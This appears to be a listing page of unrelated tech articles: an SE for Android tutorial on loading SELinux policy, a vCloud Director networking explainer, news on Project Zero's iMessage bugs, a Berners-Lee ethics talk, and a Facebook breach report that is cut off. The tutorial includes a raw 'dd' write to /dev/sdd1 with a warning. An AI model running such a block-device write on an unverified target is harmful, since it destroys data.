Apply patches to load and verify an NSA policy

(For more resources related to this topic, see here.)

You might have noticed some disturbing error messages in dmesg. To refresh your memory, here are some of them:

# dmesg | grep -i selinux
<6>SELinux: Initializing.
<7>SELinux: Starting in permissive mode
<7>SELinux: Registering netfilter hooks
<3>SELinux: policydb version 26 does not match my version range 15-23
...

It would appear that even though SELinux is enabled, we don't quite have an error-free system. At this point, we need to understand what causes this error, and what we can do to rectify it. At the end of this article, we should be able to identify the boot process of an SE for Android device with respect to policy loading, and how that policy is loaded into the kernel. We will then address the policy version error.

Policy load

An Android device follows a boot sequence similar to the *NIX booting sequence. The boot loader boots the kernel, and the kernel finally executes the init process. The init process is responsible for managing the boot process of the device through init scripts and some hard-coded logic in the daemon. Like all processes, init has an entry point at the main function. This is where the first userspace process begins. The code can be found by navigating to system/core/init/init.c.

When the init process enters main (refer to the following code excerpt), it processes cmdline, mounts some tmpfs filesystems such as /dev, and some pseudo-filesystems such as procfs.
For SE for Android devices, init was modified to load the policy into the kernel as early in the boot process as possible. The policy in an SELinux system is not built into the kernel; it resides in a separate file. In Android, the only filesystem mounted in early boot is the root filesystem, a ramdisk built into boot.img. The policy can be found in this root filesystem at /sepolicy on the UDOO or target device. At this point, the init process calls a function to load the policy from the disk and send it to the kernel, as follows:

int main(int argc, char *argv[]) {
...
  process_kernel_cmdline();

  union selinux_callback cb;
  cb.func_log = klog_write;
  selinux_set_callback(SELINUX_CB_LOG, cb);

  cb.func_audit = audit_callback;
  selinux_set_callback(SELINUX_CB_AUDIT, cb);

  INFO("loading selinux policy\n");
  if (selinux_enabled) {
    if (selinux_android_load_policy() < 0) {
      selinux_enabled = 0;
      INFO("SELinux: Disabled due to failed policy load\n");
    } else {
      selinux_init_all_handles();
    }
  } else {
    INFO("SELinux:  Disabled by command line option\n");
  }
...

In the preceding code, you will notice the very nice log message, SELinux: Disabled due to failed policy load, and wonder why we didn't see this when we ran dmesg before. This code executes before setlevel in init.rc is executed. The default init log level is set by the definition of KLOG_DEFAULT_LEVEL in system/core/include/cutils/klog.h. If we really wanted to, we could change that, rebuild, and actually see that message.

Now that we have identified the initial path of the policy load, let's follow it on its course through the system. The selinux_android_load_policy() function can be found in the Android fork of libselinux, which is in the UDOO Android source tree. The library can be found at external/libselinux, and all of the Android modifications can be found in src/android.c.

The function starts by mounting a pseudo-filesystem called SELinuxFS.
In systems that do not have sysfs mounted, the mount point is /selinux; on systems that have sysfs mounted, the mount point is /sys/fs/selinux. You can check the mount points on a running system using the following command:

# mount | grep selinuxfs
selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0

SELinuxFS is an important filesystem as it provides the interface between the kernel and userspace for controlling and manipulating SELinux. As such, it has to be mounted for the policy load to work. The policy load uses the filesystem to send the policy file bytes to the kernel. This happens in the selinux_android_load_policy() function:

int selinux_android_load_policy(void)
{
  char *mnt = SELINUXMNT;
  int rc;
  rc = mount(SELINUXFS, mnt, SELINUXFS, 0, NULL);
  if (rc < 0) {
    if (errno == ENODEV) {
      /* SELinux not enabled in kernel */
      return -1;
    }
    if (errno == ENOENT) {
      /* Fall back to legacy mountpoint. */
      mnt = OLDSELINUXMNT;
      rc = mkdir(mnt, 0755);
      if (rc == -1 && errno != EEXIST) {
        selinux_log(SELINUX_ERROR, "SELinux:  Could not mkdir:  %s\n",
          strerror(errno));
        return -1;
      }
      rc = mount(SELINUXFS, mnt, SELINUXFS, 0, NULL);
    }
  }
  if (rc < 0) {
    selinux_log(SELINUX_ERROR, "SELinux:  Could not mount selinuxfs:  %s\n",
      strerror(errno));
    return -1;
  }
  set_selinuxmnt(mnt);

  return selinux_android_reload_policy();
}

The set_selinuxmnt(char *mnt) function changes a global variable in libselinux so that other routines can find the location of this vital interface. From there it calls another helper function, selinux_android_reload_policy(), which is located in the same libselinux android.c file. It loops through an array of possible policy locations in priority order.
This array is defined as follows:

static const char *const sepolicy_file[] = {
  "/data/security/current/sepolicy",
  "/sepolicy",
  0
};

Since only the root filesystem is mounted, it chooses /sepolicy at this time. The other path is for dynamic runtime reloads of policy. After acquiring a valid file descriptor to the policy file, the file is memory mapped into the process's address space, and security_load_policy(map, size) is called to load it into the kernel. This function is defined in load_policy.c. Here, the map parameter is the pointer to the beginning of the policy file, and the size parameter is the size of the file in bytes:

int selinux_android_reload_policy(void)
{
  int fd = -1, rc;
  struct stat sb;
  void *map = NULL;
  int i = 0;

  while (fd < 0 && sepolicy_file[i]) {
    fd = open(sepolicy_file[i], O_RDONLY | O_NOFOLLOW);
    i++;
  }
  if (fd < 0) {
    selinux_log(SELINUX_ERROR, "SELinux:  Could not open sepolicy:  %s\n",
      strerror(errno));
    return -1;
  }
  if (fstat(fd, &sb) < 0) {
    selinux_log(SELINUX_ERROR, "SELinux:  Could not stat %s:  %s\n",
      sepolicy_file[i], strerror(errno));
    close(fd);
    return -1;
  }
  map = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
  if (map == MAP_FAILED) {
    selinux_log(SELINUX_ERROR, "SELinux:  Could not map %s:  %s\n",
      sepolicy_file[i], strerror(errno));
    close(fd);
    return -1;
  }

  rc = security_load_policy(map, sb.st_size);
  if (rc < 0) {
    selinux_log(SELINUX_ERROR, "SELinux:  Could not load policy:  %s\n",
      strerror(errno));
    munmap(map, sb.st_size);
    close(fd);
    return -1;
  }

  munmap(map, sb.st_size);
  close(fd);
  selinux_log(SELINUX_INFO, "SELinux: Loaded policy from %s\n", sepolicy_file[i]);

  return 0;
}

The security_load_policy() function opens the <selinuxmnt>/load file, which in our case is /sys/fs/selinux/load.
At this point, the policy is written to the kernel via this pseudo-file:

int security_load_policy(void *data, size_t len)
{
  char path[PATH_MAX];
  int fd, ret;

  if (!selinux_mnt) {
    errno = ENOENT;
    return -1;
  }

  snprintf(path, sizeof path, "%s/load", selinux_mnt);
  fd = open(path, O_RDWR);
  if (fd < 0)
    return -1;

  ret = write(fd, data, len);
  close(fd);
  if (ret < 0)
    return -1;
  return 0;
}

Fixing the policy version

At this point, we have a clear idea of how the policy is loaded into the kernel. This is very important. SELinux integration with Android began in Android 4.0, so when porting to various forks and fragments, this breaks, and code is often missing. Understanding all parts of the system, however cursory, will help us to correct issues as they appear in the wild and develop. This information is also useful for understanding the system as a whole, so when modifications need to be made, you'll know where to look and how things work.

At this point, we're ready to correct the policy versions. The logs and kernel config are clear; only policy versions up to 23 are supported, and we're trying to load policy version 26. This will probably be a common problem with Android considering kernels are often out of date. There is also an issue with the 4.3 sepolicy shipped by Google. Some changes by Google made it a bit more difficult to configure devices as they tailored the policy to meet their release goals. Essentially, the policy allows nearly everything and therefore generates very few denial logs. Some domains in the policy are completely permissive via a per-domain permissive statement, and those domains also have rules to allow everything, so denial logs do not get generated. To correct this, we can use a more complete policy from the NSA. Replace external/sepolicy with the download from https://bitbucket.org/seandroid/external-sepolicy/get/seandroid-4.3.tar.bz2.

After we extract the NSA's policy, we need to correct the policy version.
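To recap the mechanism: security_load_policy() reads the binary policy into memory and writes those bytes through the load pseudo-file. The same flow can be mimicked in a few lines of Python. The sketch below runs against an ordinary scratch directory standing in for /sys/fs/selinux, since writing the real pseudo-file requires a live SELinux kernel and root:

```python
import os
import tempfile

def load_policy(policy_path: str, selinux_mnt: str) -> int:
    """Read the binary policy and write it to <mnt>/load, as the C code does."""
    with open(policy_path, "rb") as f:
        data = f.read()                       # stands in for mmap() in the C code
    with open(os.path.join(selinux_mnt, "load"), "wb") as load_file:
        return load_file.write(data)

# Demo against a scratch directory acting as the selinuxfs mount point.
mnt = tempfile.mkdtemp()
policy = os.path.join(mnt, "sepolicy")
with open(policy, "wb") as f:
    f.write(b"\x8c\xff\x7c\xf9 fake-policy-bytes")  # made-up stand-in content
written = load_policy(policy, mnt)
print(written, "bytes written")
```

On a real device, the kernel parses the bytes written to /sys/fs/selinux/load and rejects them with an error (as we saw in dmesg) if the policydb version is out of range.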
The policy is located in external/sepolicy and is compiled with a tool called checkpolicy. The Android.mk file for sepolicy passes this version number to the compiler, so we can adjust it here. At the top of the file, we find the culprit:

...
# Must be <= /selinux/policyvers reported by the Android kernel.
# Must be within the compatibility range reported by checkpolicy -V.
POLICYVERS ?= 26
...

Since the variable is overridable by the ?= assignment, we can override this in BoardConfig.mk. Edit device/fsl/imx6/BoardConfigCommon.mk, adding the following POLICYVERS line to the bottom of the file:

...
BOARD_FLASH_BLOCK_SIZE := 4096
TARGET_RECOVERY_UI_LIB := librecovery_ui_imx
# SELinux Settings
POLICYVERS := 23
-include device/google/gapps/gapps_config.mk

Since the policy is on the boot.img image, build the policy and bootimage:

$ mmm -B external/sepolicy/
$ make -j4 bootimage 2>&1 | tee logz

!!!!!!!!! WARNING !!!!!!!!! VERIFY BLOCK DEVICE !!!!!!!!!

$ sudo chmod 666 /dev/sdd1
$ dd if=$OUT/boot.img of=/dev/sdd1 bs=8192 conv=fsync

Eject the SD card, place it into the UDOO, and boot. The first of the preceding commands should produce the following log output:

out/host/linux-x86/bin/checkpolicy: writing binary representation (version 23) to out/target/product/udoo/obj/ETC/sepolicy_intermediates/sepolicy

At this point, by checking the SELinux logs using dmesg, we can see the following:

# dmesg | grep -i selinux
<6>init: loading selinux policy
<7>SELinux: 128 avtab hash slots, 490 rules.
<7>SELinux: 128 avtab hash slots, 490 rules.
<7>SELinux: 1 users, 2 roles, 274 types, 0 bools, 1 sens, 1024 cats
<7>SELinux: 84 classes, 490 rules
<7>SELinux: Completing initialization.

Another command we need to run is getenforce. The getenforce command gets the SELinux enforcing status.
It can be in one of three states:

Disabled: No policy is loaded or there is no kernel support

Permissive: Policy is loaded and the device logs denials (but is not in enforcing mode)

Enforcing: This state is similar to the permissive state except that policy violations result in EACCES being returned to userspace

One of the goals while booting an SELinux system is to get to the enforcing state. Permissive is used for debugging, as follows:

# getenforce
Permissive

Summary

In this article, we covered the important policy load flow through the init process. We also changed the policy version to suit our development efforts and kernel version. From there, we were able to load the NSA policy and verify that the system loaded it. This article additionally showcased some of the SELinux APIs and their interactions with SELinuxFS.

Resources for Article:

Further resources on this subject:

Android And Udoo Home Automation [article]

Sound Recorder For Android [article]

Android Virtual Device Manager [article]


vCloud Networks

Packt
13 Sep 2013
14 min read
(For more resources related to this topic, see here.)

Basics

Network virtualization is what makes vCloud Director such an awesome tool. However, before we go all out in the next article, we need to set up the network virtualization, and this is what we will be focusing on here.

When we talk about isolated networks, we are talking about vCloud Director making use of different methods of Layer 3 encapsulation (OSI/ISO model). Basically, it is the same concept that was introduced with VLANs. VLANs split up the network communication in physical network cables into different, totally isolated communication streams. vCloud makes use of these isolated networks to create isolated Org and vApp networks.

vCloud Director has three different network items:

An external network is a network that exists outside the vCloud, for example, a production network. It is basically a port group in vSphere that is used in vCloud to connect to the outside world. An external network can be connected to multiple organization networks. External networks are not virtualized and are based on existing port groups on a vSwitch or Distributed vSwitch.

An organization network (Org Net) is a network that exists only inside one organization. You can have multiple Org Nets in an organization. Organization networks come in three different shapes:

Isolated: An isolated Org Net exists only in this organization and is not connected to an external network; however, it can be connected to vApp networks or VMs. This network type uses network virtualization and its own network settings.

Routed network (Edge Gateway): An Org Net that connects to an existing Edge device. An Edge Gateway allows you to define firewall and NAT rules, as well as VPN connections and load balancing functionality. Routed gateways connect external networks to vApp networks and/or VMs. This network type uses virtualized networks and its own network settings.
Directly connected: These Org Nets are an extension of an external network into the organization. They directly connect external networks to the vApp networks or VMs. These networks do NOT use network virtualization, and they make use of the network settings of an external network.

A vApp network is a virtualized network that only exists inside a vApp. You can have multiple vApp networks inside one vApp. A vApp network can connect to VMs and to Org networks, and it has its own network settings. When connecting a vApp network to an Org network, you can create a router between the vApp and the Org network that lets you define DHCP, firewall, and NAT rules, as well as static routing.

To create isolated networks, vCloud Director uses network pools. Network pools are collections of VLANs, port groups, and networks that use L2-in-L3 encapsulation. The content of these pools can be used by Org and vApp networks for network virtualization.

Network pools

There are four kinds of network pools that can be created:

VXLAN: VXLAN networks are Layer 2 networks that are encapsulated in Layer 3 packages. VMware calls this Software Defined Networking (SDN). VXLANs are automatically created by vCD; however, they don't work out of the box and require some extra configuration in vCloud Networking and Security (see later).

Network isolation-backed: These are basically the same as VXLANs; however, they work out of the box and use MAC-in-MAC encapsulation. The difference is that VXLANs can transcend routers, while network isolation-backed networks can't.

vSphere port group-backed: vCD will use pre-created port groups to build the vApp or organization networks. You need to pre-provision one port group for every vApp/Org network you would like to use.

VLAN-backed: vCD will use a pool of VLAN numbers to automatically provision port groups on demand; however, you still need to configure the VLAN trunking. You will need to reserve one VLAN for every vApp/Org network you would like to use.
VXLANs and network isolation networks solve the problems of pre-provisioning and reserving a multitude of VLANs, which makes them extremely important. However, using port group or VLAN network pools can have additional benefits that we will explore later.

Types of vCloud network

As mentioned, vCloud Director has three different network items. An external network is basically a port group in vSphere that is imported into vCloud. An Org network is an isolated network that exists only in an organization. The same is true for vApp networks; they exist only in vApps. In the picture above you can see all possible connections. Let's play through the scenarios and see how one can use them.

Isolated vApp network

An isolated vApp network exists only inside a vApp. Such networks are useful if one needs to test how VMs behave in a network, or to test using an IP range that is already in use (e.g. production). The downside is that they are isolated, meaning it is hard to get information or software in and out. Have a look at the recipe for RDP (or SSH) forwarding into an isolated vApp to find some answers to this problem.

VMs directly connected to an external network

VMs inside a vApp are connected to a direct Org Net, meaning they will be able to get IPs from the external network pool. Typically, these VMs are used for production, meaning that customers choose vCloud for fast provisioning of predefined templates. As vCloud manages the IPs for a given IP range, it can be quite easy to fast provision a VM.

vApp network connected via a vApp router to an external network

VMs are connected to a vApp network that has a vApp router defined as its gateway. The gateway connects to a direct Org Net, meaning that the gateway will automatically be given an IP from the external network pool. These configurations come in handy to reduce the amount of "physical" networking that has to be done. The vApp router can act as a router with defined firewall rules; it can do SNAT and DNAT, as well as define static routing.
So instead of using up a "physical" VLAN or subnet, one can hide away applications this way. As an added benefit, these applications can be used as templates for fast deployment.

VMs directly connected to an isolated Org Net

VMs are connected directly to an isolated Org Net. Connecting VMs directly to an isolated network normally only makes sense if there is more than one vApp/VM connected to the Org Net. This is used as an extension of the isolated vApp concept. Say you repeatedly need to test complex applications that require certain infrastructure, such as Active Directory, DHCP, DNS, database, or Exchange servers. Instead of deploying large isolated vApps that contain these, you could deploy them in one vApp and connect them via an isolated Org Net directly to the vApp that contains your testing VMs. This makes it possible to reuse this base infrastructure. By using sharing, you can even hide away the infrastructure vApp from your users.

vApp connected via a vApp router to an isolated Org Net

VMs are connected to a vApp network that has a vApp router as its gateway. The vApp router automatically gets its IP from the Org Net pool. This is basically a variant of the previous idea. A test vApp or an infrastructure vApp can be packaged this way and be made ready for fast deployment.

VMs connected directly to an Edge

VMs are directly connected to the Edge Org Net and get their IPs from the Org Net pool. Their gateway is the Edge device that connects them to the external networks through the Edge firewall. A very typical setup is using the Edge load balancing feature to load balance VMs out of a vApp via the Edge. Another one is that the organization is secured using the Edge Gateway against other organizations that use the same external network. This is mostly the case if the external network is the Internet and each organization is an external customer.

vApp connected to an Edge via a vApp router

VMs are connected to a vApp network that has the vApp router as its gateway.
The vApp router will automatically get an IP from the Org Net, which has the Edge as its gateway. This is a more complicated variant of the above scenario, allowing customers to package their VMs, secure them against other vApps or VMs, or subdivide their allocated networks.

IP management

Let's have a look into IP management with vCloud. vCloud knows three different settings for the IP management of VMs:

DHCP: You need to provide a DHCP server; vCloud doesn't automatically create one. However, a vApp router or an Edge can create one.

Static – IP Pool: The IP for the VM comes from the static IP pool of the network it is connected to. In addition to that, the DNS and domain suffix will be written to the VM.

Static – Manual: The IP can be defined on the spot; however, it must be in the network defined by the gateway and the network mask of the network the VM is connected to. In addition to that, the DNS and domain suffix will be written to the VM.

All these settings require guest customization to be effective. If no guest customization is selected, they don't work, and whatever the VM was configured with as a template will be used.

vSphere and vCloud vApps

One thing that needs to be said about vApps is that they actually come in two completely different versions: the vCenter vApp and the vCloud vApp. The vSphere vApp concept was introduced in vSphere 4.0 as a container for VMs. In vSphere, a vApp is essentially a resource pool with some extras, such as a starting and stopping order and (if you configured it) a network IP allocation method. The idea is to have an entity of VMs that builds one unit. Such a vApp can then be exported or imported using the OVF format. A very good example of a vApp is VMware Operations Manager. It comes as a vApp in OVF format and contains not only the VMs but also the start-up sequence, as well as some setup scripts. When the vApp is deployed for the first time, additional information such as network settings is asked for and then implemented.
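The Static – IP Pool setting described above can be modelled as a simple allocator: hand out the next free address from a configured range and record which VM holds it. This is a simplified toy model for illustration, not vCloud's actual implementation:

```python
import ipaddress

class StaticIPPool:
    """Toy model of a vCloud network's static IP pool."""

    def __init__(self, first: str, last: str, gateway: str, dns: str):
        start, end = ipaddress.ip_address(first), ipaddress.ip_address(last)
        self.free = [str(ipaddress.ip_address(i))
                     for i in range(int(start), int(end) + 1)]
        self.gateway, self.dns = gateway, dns
        self.leases = {}                     # VM name -> assigned IP

    def allocate(self, vm_name: str) -> dict:
        """Give the next free IP to a VM, along with the gateway and DNS
        settings that guest customization would write into the guest."""
        ip = self.free.pop(0)
        self.leases[vm_name] = ip
        return {"ip": ip, "gateway": self.gateway, "dns": self.dns}

pool = StaticIPPool("192.168.10.100", "192.168.10.110",
                    gateway="192.168.10.1", dns="192.168.10.2")
print(pool.allocate("web01"))  # ip 192.168.10.100, plus gateway and DNS
print(pool.allocate("web02"))  # ip 192.168.10.101, plus gateway and DNS
```

Tracking leases like this is also why vCloud can safely fast-provision VMs into a range: it always knows which addresses are still free.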
As a vSphere vApp is a resource pool, it can be configured so that it will only demand resources that it is using; on the other hand, resource pool configuration is something that most people struggle with. A vSphere vApp is ONLY a resource pool; it is not automatically a folder in the Folder and Template view of vSphere, but is shown there again as a vApp.

The vCloud vApp is a very different concept; first of all, it is not a resource pool. The VMs of a vCloud vApp live in the OvDC resource pool. However, the vCloud vApp is automatically a folder in the Folder and Template view of vSphere. It is a construct that is created by vCloud; it consists of VMs, a start and stop sequence, and networks. The network part is one of the major differences (next to the resource pool). In vSphere, only network information, such as how IPs get assigned, and settings such as gateway and DNS, are given to the vApp; a vCloud vApp actually encapsulates networks. The vCloud vApp networks are full networks, meaning they contain the full information for a given network, including network settings and IP pools. For more details see the last article. This information is kept when importing and exporting vCloud vApps. When I talk about vApps in the book, I will always mean vCloud vApps; vCenter vApps, where featured, will be written as vCenter vApps.

Datastores, profiles, and clusters

I probably don't have to explain what a datastore is, but here is a short intro just in case. A datastore is a VMware object that exists in ESXi. This object can be a hard disk that is attached to an ESXi server, an NFS or iSCSI mount on an ESXi host, or a Fibre Channel disk that is attached to an HBA on the ESXi server.

A storage profile is a container that contains one or more datastores. A storage profile doesn't have any intelligence implemented; it just groups the storage. However, it is extremely beneficial in vCloud.
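Since a storage profile is just a named group of datastores, it can be modelled in a few lines. The sketch below is a toy illustration — the "most free space" placement rule and all names are made up for the example, not how vSphere actually places disks:

```python
class StorageProfile:
    """Toy model: a storage profile is a named group of datastores."""

    def __init__(self, name: str):
        self.name = name
        self.datastores = {}          # datastore name -> free space in GB

    def add_datastore(self, name: str, free_gb: int) -> None:
        self.datastores[name] = free_gb

    def place_disk(self, size_gb: int) -> str:
        """Place a virtual disk on the datastore with the most free space
        (an illustrative placement rule, not vSphere's algorithm)."""
        best = max(self.datastores, key=self.datastores.get)
        if self.datastores[best] < size_gb:
            raise RuntimeError("profile is out of space; add a datastore")
        self.datastores[best] -= size_gb
        return best

gold = StorageProfile("Gold")
gold.add_datastore("ds-ssd-01", free_gb=500)
gold.add_datastore("ds-ssd-02", free_gb=800)
print(gold.place_disk(100))  # ds-ssd-02
```

The model makes the grouping benefit obvious: callers address the profile, not an individual datastore, so capacity can be extended by simply adding another member.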
If you run out of storage on a datastore, you can just add another datastore to the same Storage Profile and you're back in business. Datastore Clusters are again containers for datastores, but now there is intelligence included. A Datastore Cluster can use Storage DRS, which allows VMs to automatically use Storage vMotion to move from one datastore to another if the I/O latency is too high or the free storage too low. Depending on your storage backend system this can be extremely useful. vCloud Director doesn't know the difference between a Storage Profile and a Datastore Cluster. If you add a Datastore Cluster, vCloud will pick it up as a Storage Profile, which is not a problem at all. Be aware that Storage Profiles are part of vSphere Enterprise Plus licensing. If you don't have Enterprise Plus, you won't get Storage Profiles, and the only thing you can do in vCloud is use the storage profile ANY, which doesn't contribute to productivity.

Thin provisioning

Thin Provisioning means that the file that contains the virtual hard disk (.vmdk) is only as big as the amount of data actually written to the virtual hard disk. As an example, if you have a 40GB hard disk attached to a Windows VM and have just installed Windows on it, you are using around 2GB of the 40GB disk. When using Thin Provisioning, only 2GB will be written to the datastore, not 40GB. If you don't use Thin Provisioning, the .vmdk file will be 40GB in size. If your storage vendor's Storage APIs are integrated with your ESXi servers, Thin Provisioning may be offloaded to your storage backend, making it even faster.

Fast Provisioning

Fast Provisioning is similar to the linked clones you may know from Lab Manager or VMware View. However, in vCloud they are a bit more intelligent than in those other products: there, linked clones can NOT be deployed across different datastores, but in vCloud they can. Let's talk about how linked clones work.
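Before moving on, the thin-provisioning arithmetic described above boils down to a one-liner. This sketch (purely illustrative, the function name is made up) uses the 40GB Windows disk example from the text:

```python
def vmdk_size_gb(disk_size_gb, data_written_gb, thin_provisioned):
    """Space a .vmdk consumes on the datastore: only the data
    actually written when thin provisioned, the full configured
    disk size otherwise."""
    return data_written_gb if thin_provisioned else disk_size_gb

# 40GB virtual disk with ~2GB of Windows installed on it:
thin = vmdk_size_gb(40, 2, thin_provisioned=True)    # 2GB on the datastore
thick = vmdk_size_gb(40, 2, thin_provisioned=False)  # 40GB on the datastore
```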
If you have a VM with a 40GB hard disk and you clone it, you would normally have to spend another 40GB (when not using Thin Provisioning). Using linked clones, you will need less than another 40GB. What happens, in layman's terms, is that vCloud creates two snapshots of the original VM's hard disk. A snapshot contains only the differences from the original. The original hard disk (.vmdk file) is set to read-only; the first snapshot is connected to the original VM, so that one can still work with the original VM, and the second snapshot is used to create the new VM. Using snapshots makes deploying a VM with Fast Provisioning not only fast, it also saves a lot of disk space. The problem with this is that a snapshot must be on the same datastore as its source. So if you have a VM in one datastore, its linked clone cannot be in another. vCloud has solved that problem by deploying a Shadow VM. When you deploy a VM with Fast Provisioning onto a different datastore than its source, vCloud creates a full clone (a normal full copy) of the VM onto the new datastore and then creates a linked clone from that Shadow VM. If your storage vendor's Storage APIs are integrated with your ESXi servers, Fast Provisioning may be offloaded to your storage backend, making it faster. See also the recipe “Making NFS based datastores faster”.

Summary

In this article, we looked at vCloud networks, vSphere and vCloud vApps, and datastores, profiles and clusters.

Resources for Article:

Further resources on this subject: Windows 8 with VMware View [Article] VMware View 5 Desktop Virtualization [Article] Cloning and Snapshots in VMware Workstation [Article]

Savia Lobo
31 Jul 2019
3 min read

Google Project Zero reveals six “interactionless” bugs that can affect iOS via Apple’s iMessage

Yesterday, two members of the Google Project Zero team revealed six “interactionless” security bugs that affect iOS via the iMessage client. Four of these bugs can execute malicious code on a remote iOS device without any prior user interaction. Apple released fixes for these bugs in the iOS 12.4 update on July 22. The two Project Zero researchers, Natalie Silvanovich and Samuel Groß, published details and demo proofs-of-concept for only five of the six vulnerabilities. Details of one of the "interactionless" vulnerabilities have been kept private because Apple's iOS 12.4 patch did not completely resolve the bug, according to Natalie Silvanovich. https://twitter.com/natashenka/status/1155941211275956226

4 bugs can perform an RCE via a malformed message

Bugs with vulnerability IDs CVE-2019-8647, CVE-2019-8660, CVE-2019-8662, and CVE-2019-8641 (the one whose details are kept private) can execute malicious code on a remote iOS device. The attacker simply has to send a malformed message to the victim's phone. Once the user opens the message and views it, the malicious code will execute automatically without the user knowing about it.

2 bugs can leak a user's on-device data to a remote device

The other two bugs, CVE-2019-8624 and CVE-2019-8646, allow an attacker to leak data from a user's device memory and read files off a remote device. This, too, can happen without the user knowing. “Apple's own notes about iOS 12.4 indicate that the unfixed flaw could give hackers a means to crash an app or execute commands of their own on recent iPhones, iPads and iPod Touches if they were able to discover it”, BBC reports. Silvanovich will talk about these remote, interactionless iPhone vulnerabilities at this year's Black Hat security conference, held in Las Vegas from August 3 - 8.
An abstract of her talk reads, “There have been rumors of remote vulnerabilities requiring no user interaction being used to attack the iPhone, but limited information is available about the technical aspects of these attacks on modern devices.” Her presentation will explore “the remote, interaction-less attack surface of iOS. It discusses the potential for vulnerabilities in SMS, MMS, Visual Voicemail, iMessage and Mail, and explains how to set up tooling to test these components. It also includes two examples of vulnerabilities discovered using these methods.” According to ZDNet, “When sold on the exploit market, vulnerabilities like these can bring a bug hunter well over $1 million, according to a price chart published by Zerodium. It wouldn't be an exaggeration to say that Silvanovich just published details about exploits worth well over $5 million, and most likely valued at around $10 million”. For iOS users who haven't yet updated to the latest version, it is advisable to install the iOS 12.4 release without delay. Early this month, the Google Project Zero team revealed a bug in Apple's iMessage that bricks iPhones, causing repeated crash and respawn operations. That bug was patched in the iOS 12.3 update. To know more about these five vulnerabilities in detail, visit the Google Project Zero bug report page. Stripe’s API degradation RCA found unforeseen interaction of database bugs and a config change led to cascading failure across critical services Azure DevOps report: How a bug caused ‘sqlite3 for Python’ to go missing from Linux images Is the Npm 6.9.1 bug a symptom of the organization’s cultural problems?
Sugandha Lahoti
25 Oct 2018
4 min read

Sir Tim Berners-Lee on digital ethics and socio-technical systems at ICDPPC 2018

At the ongoing 40th International Conference of Data Protection and Privacy Commissioners (ICDPPC), Sir Tim Berners-Lee spoke on ethics and the Internet. The ICDPPC conference, which is taking place in Brussels this week, brings together an international audience on digital ethics, a topic the European Data Protection Supervisor initiated in 2015. Some high-profile speakers and their presentations include Giovanni Buttarelli, European Data Protection Supervisor, on ‘Choose Humanity: Putting Dignity back into Digital’; a video interview with Guido Raimondi, President of the European Court of Human Rights; Tim Cook, CEO of Apple, on personal data and user privacy; and ‘What is Ethics?’ by Anita Allen, Professor of Law and Professor of Philosophy, University of Pennsylvania, among others. Per Techcrunch, Tim Berners-Lee urged tech industries and experts to pay continuous attention to the world their software is consuming as they go about connecting humanity through technology. “Ethics, like technology, is design. As we’re designing the system, we’re designing society. Ethical rules that we choose to put in that design [impact the society]… Nothing is self-evident. Everything has to be put out there as something that we think will be a good idea as a component of our society,” he told the delegates present at the conference. He also described digital platforms as “socio-technical systems” — meaning “it’s not just about the technology when you click on the link it is about the motivation someone has, to make such a great thing and get excited just knowing that other people are reading the things that they have written”. “We must consciously decide on both of these, both the social side and the technical side,” he said. “The tech platforms are anthropogenic. They’re made by people. They’re coded by people.
And the people who code them are constantly trying to figure out how to make them better.” According to Techcrunch, he also touched on the Cambridge Analytica data misuse scandal as an illustration of how socio-technical systems are exploding simple notions of individual rights. “Your data is being taken and mixed with that of millions of other people, billions of other people in fact, and then used to manipulate everybody. Privacy is not just about not wanting your own data to be exposed — it’s not just not wanting the pictures you took of yourself to be distributed publicly. But that is important too.” He also revealed new plans for his startup, Inrupt, which was launched last month to change the web for the better. His major goal with Inrupt is to decentralize the web and get rid of gigantic tech monopolies’ (Facebook, Google, Amazon, etc.) stronghold over user data. He hopes to achieve this with Inrupt’s new open-source project, Solid, a platform built using the existing web format. He explained that his platform can put people in control of their own data. “The app,” he explains, “asks you where you want to put your data. So you can run your photo app or take pictures on your phone and say I want to store them on Dropbox, and I will store them on my own home computer. And it does this with a new technology which provides interoperability between any app and any store.” “The platform turns the privacy world upside down — or, I should say, it turns the privacy world right side up. You are in control of your data life… Wherever you store it you can control and get access to it.” He concluded by saying, “We have to get commitments from companies to make their platforms constructive and we have to get commitments from governments to look at whenever they see that a new technology allows people to be taken advantage of, allows a new form of crime to get onto it by producing new forms of the law.
And to make sure that the policies that they do are thought about in respect to every new technology as they come out.” The day before yesterday, The Public Voice Coalition, an organization that promotes public participation in decisions regarding the future of the Internet, came out with guidelines for AI, namely, Universal Guidelines on Artificial Intelligence at ICDPPC. Tim Berners-Lee plans to decentralize the web with ‘Solid’, an open-source project for “personal empowerment through data” EPIC’s Public Voice Coalition announces Universal Guidelines for Artificial Intelligence (UGAI) at ICDPPC 2018 California’s tough net neutrality bill passes state assembly vote.

Sugandha Lahoti
01 Oct 2018
4 min read

Facebook’s largest security breach in its history leaves 50M user accounts compromised

Facebook has been going through a massive decline in trust in recent times. And to make matters worse, it witnessed another massive security breach last week. On Friday, Facebook announced that nearly 50M Facebook accounts had been compromised by an attack that gave hackers the ability to take over users’ accounts. This security breach has not only affected users’ Facebook accounts but also impacted other accounts linked to Facebook. This means that a hacker could have accessed any account of yours that you log into using Facebook. The security issue was first discovered by Facebook on Tuesday, September 25. The hackers apparently exploited a series of interactions between three bugs related to Facebook’s “View As” feature, which lets people see what their own profile looks like to someone else. The hackers stole Facebook access tokens to take over people’s accounts. These tokens allow an attacker to take full control of the victim’s account, including logging into third-party applications that use Facebook Login. “I’m glad we found this and fixed the vulnerability,” Mark Zuckerberg said on a conference call with reporters on Friday morning. “But it definitely is an issue that this happened in the first place. I think this underscores the attacks that our community and our services face.” As of now, the vulnerability has been fixed and Facebook has contacted law enforcement authorities. The vice-president of product management, Guy Rosen, said that Facebook was working with the FBI, but he did not comment on whether national security agencies were involved in the investigation. As a security measure, Facebook has automatically logged out 90 million Facebook users from their accounts. These included the 50 million that Facebook knows were affected and an additional 40 million that potentially could have been. The attack exploited the complex interaction of multiple issues in Facebook code.
